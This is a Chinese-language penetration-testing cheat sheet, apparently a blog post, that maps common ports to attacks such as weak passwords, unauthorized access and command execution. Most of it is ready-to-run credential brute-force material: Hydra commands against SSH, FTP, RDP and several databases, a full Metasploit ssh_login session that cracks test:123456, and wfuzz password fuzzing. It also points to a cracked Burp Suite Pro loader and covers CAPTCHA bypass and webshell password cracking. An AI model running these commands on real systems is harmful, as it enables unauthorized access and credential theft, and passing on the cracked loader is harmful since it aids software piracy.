常见端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
1,web类(web漏洞/敏感目录)

第三方通用组件漏洞struts thinkphp jboss ganglia zabbix

80 web
80-89 web
8000-9090 web

2,数据库类(扫描弱口令)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

3,特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

4,常用端口类(扫描弱口令/端口爆破)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由,默认密码zebra
3389 远程桌面

端口合计详情

21 ftp

22 SSH

23 Telnet

80 web

80-89 web

161 SNMP

389 LDAP

443 SSL心脏滴血以及一些web漏洞测试

445 SMB

512,513,514 Rexec

873 Rsync未授权

1025,111 NFS

1433 MSSQL

1521 Oracle:(iSqlPlus Port:5560,7778)

2082/2083 cpanel主机管理系统登陆 (国外用较多)

2222 DA虚拟主机管理系统登陆 (国外用较多)

2601,2604 zebra路由,默认密码zebra

3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了

3306 MySQL

3312/3311 kangle主机管理系统登陆

3389 远程桌面

4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网

5432 PostgreSQL

5900 vnc

5984 CouchDB http://xxx:5984/_utils/

6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网

6379 redis未授权

7001,7002 WebLogic默认弱口令,反序列

7778 Kloxo主机控制面板登录

8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上

8080 tomcat/WDCP主机管理系统,默认弱口令

8080,8089,9090 JBOSS

8083 Vestacp主机管理系统 (国外用较多)

8649 ganglia

8888 amh/LuManager 主机管理系统默认端口

9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞

10000 Virtualmin/Webmin 服务器虚拟主机管理系统

11211 memcache未授权访问

27017,27018 Mongodb未授权访问

28017 mongodb统计页面

50000 SAP命令执行

50070,50030 hadoop默认端口未授权访问


Hydra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
-R 继续从上一次进度接着破解。 

-S 采用 SSL 链接。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。

-v / -V 显示详细过程。
-o 指定输出文件
service 指定服务名,支持的服务和协议:telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp 等等
1
hydra -l root -P password.txt ssh://***.***.***.*** -vV -t 15
1
2
[STATUS] attack finished for ***.***.***.*** (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found

指定多个ip进行穷举 导入-M IP地址文件

1
hydra -l root -P password.txt -M ip.txt ssh -o IPS.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V 
ftp
hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V
rdp
hydra -L /root/user -P /root/passwd rdp://192.168.1.0 -f -o /root/crack.txt -V
mssql
hydra -L /root/user -P /root/passwd mssql://192.168.0.129 -f -o /root/crack.txt -v
mysql
hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt –v -s 3306
oracle
hydra -P /root/passwd oracle://192.168.0.129 -f -o /root/crack.txt –v
redis
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
postgresql 弱口令检测
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql
指定多个ip进行穷举
hydra -L /root/user -P /root/passlist -M /root/ip.txt -V -o /root/crack mysql -t 16
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f -o /root/crack.txt
hydra -L /root/user -P /root/passlist ftp://192.168.0.106 -vV -f -o /root/crack.txt
hydra -l sa -P /root/passlist mssql://192.168.0.103 –vV

可视化xhydra

image-20210411132809783

没啥好说的, image-20210411132919841

msf穷举模块

测试ip:***********

测试账号:test

测试密码:123456

1
msf6 > use auxiliary/scanner/ssh/ssh_login
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > info

Name: SSH Login Check Scanner
Module: auxiliary/scanner/ssh/ssh_login
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
todb <[email protected]>

Check supported:
No

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'f
ile:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per li
ne
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts

Description:
This module will test ssh logins on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

References:
https://cvedetails.com/cve/CVE-1999-0502/

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS *********
RHOSTS => *********
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME test
USERNAME => test
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/
.ICEauthority .config .hushlogin .python_history Desktop Public
.Xauthority .dbus .local .viminfo Documents Templates
.bash_history .face .msf4 .vnc Downloads Videos
.bashrc .face.icon .pip .zsh_history Music tools
.cache .gnupg .profile .zshrc Pictures
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/pass
passlist password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/password.txt
PASS_FILE => /root/tools/穷举工具/password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current data
base
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/tools/穷举工具/password.txt no File containing passwords, one per line
RHOSTS ********** yes The target host(s), range CIDR identifier, or hosts file
with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME test no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space,
one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS teur
[-] The following options failed to validate: Value 'teur' is not valid for option 'STOP_ON_SUCCESS'.
STOP_ON_SUCCESS => false
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] ************:22 - Success: 'test:123456' 'Could not chdir to home directory /home/test: No such file or directory This account is currently not available. Could not chdir to home directory /home/test: No such file or directory This account is currently not available. '
[-] *************:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/telnet/telnet_login auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mysql/mysql_login auxiliary/scanner/oracle/oracle_login auxiliary/scanner/postgres/postgres_login auxiliary/scanner/vnc/vnc_login auxiliary/scanner/pcanywhere/pcanywhere_login auxiliary/scanner/snmp/snmp_login 


用法
msfconsole
msf auxiliary(mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > run
set 设置
show options 查询设置
back 返回
info 查询模块的信息
exploit/run 运行模块

邮箱破解

image-20210411140441052

后台密码穷举

burp下载🔰雨苁
打包了份启动器
无后台

1
2
源代码 就是
java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader.jar -noverify -jar burpsuite_pro.jar

把下载的burp文件重命名如下

该exe使用方法

  • 创建快捷方式
  • 固定到开始屏幕

burploader-old.jar 为激活工具

1
java -jar burploader-old.jar

使用方法🔰雨苁博客有

wordpress

  • cmsmap穷举

一句话破解

  • cheetah

webshell密码破解

​ 验证码后台破解

  • 验证码cookie是否能重复利用
  • 能否重复利用
  • 绕过
  • ocr识别

wfuzz多线程百万密码测试

1
2
#example
wfuzz -c -z file./passwd.txt -u url -d "username=root&passed=FUZZ"

有 token 防御的网站后台

image-20221027172417758